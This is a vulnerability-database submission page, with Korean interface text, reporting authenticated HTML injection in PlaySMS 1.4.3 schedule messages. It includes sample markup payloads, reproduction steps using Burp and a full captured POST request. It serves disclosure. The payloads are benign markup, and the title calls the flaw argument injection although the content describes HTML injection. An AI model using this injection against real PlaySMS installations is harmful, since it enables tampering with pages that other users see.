제출 #347385: playsms 1.4.3 Argument Injection정보

제목playsms 1.4.3 Argument Injection
설명PlaySMS 1.4.3 has authenticated HTML Injection in schedule messages Payloads: <br><h1> Olá </h1></br> <div style="background-image: url('https://cdn.donmai.us/sample/db/87/__yoru_chainsaw_man_drawn_by_ateoyh__sample-db87b0589605724a7b121afc2fe03a82.jpg'); width: 1000px; height: 1000px;"></div> PoC 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Click in My Account > Schedule messages (/index.php?app=main&inc=feature_schedule&op=list) 3. Click in Add SMS schedule 4. Intercept with burp and add payload <br><h1> Olá </h1></br> in "name" and "message" field 5. Save and back to http://192.168.1.20/playsms/index.php?app=main&inc=feature_schedule&op=list -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- POST /playsms/index.php?app=main&inc=feature_schedule&route=edit&op=edit_yes HTTP/1.1 Host: 192.168.1.20 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 177 Origin: http://192.168.1.20 Connection: keep-alive Referer: http://192.168.1.20/playsms/index.php?app=main&inc=feature_schedule&route=edit&op=list&id=2 Cookie: main_config_last_tab=%23tabs-site-configuration; PHPSESSID=9a0e3569hordkgjqma5qknmli3 Upgrade-Insecure-Requests: 1 X-CSRF-Token=5f6490434b82ce1fbc84b34a01a513f4&id=2&name=%3Cbr%3E%3Ch1%3E+Ol%C3%A1+%3C%2Fh1%3E%3C%2Fbr%3E&message=%3Cbr%3E%3Ch1%3E+Ol%C3%A1+%3C%2Fh1%3E%3C%2Fbr%3E&schedule_rule=0 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Ref: https://playsms.org
원천⚠️ http://192.168.1.20/playsms/index.php?app=main&inc=feature_schedule&op=list
사용자
 Dhimitri (UID 45045)
제출2024. 05. 30. PM 07:56 (2 연령 ago)
모더레이션2024. 06. 11. PM 01:29 (12 days later)
상태수락
VulDB 항목267912 [playSMS 까지 1.4.7 SMS Schedule index.php?app=main&inc=feature_schedule&op=list name/message 크로스 사이트 스크립팅]
포인트들20

이전개요다음

Interested in the pricing of exploits?

See the underground prices here!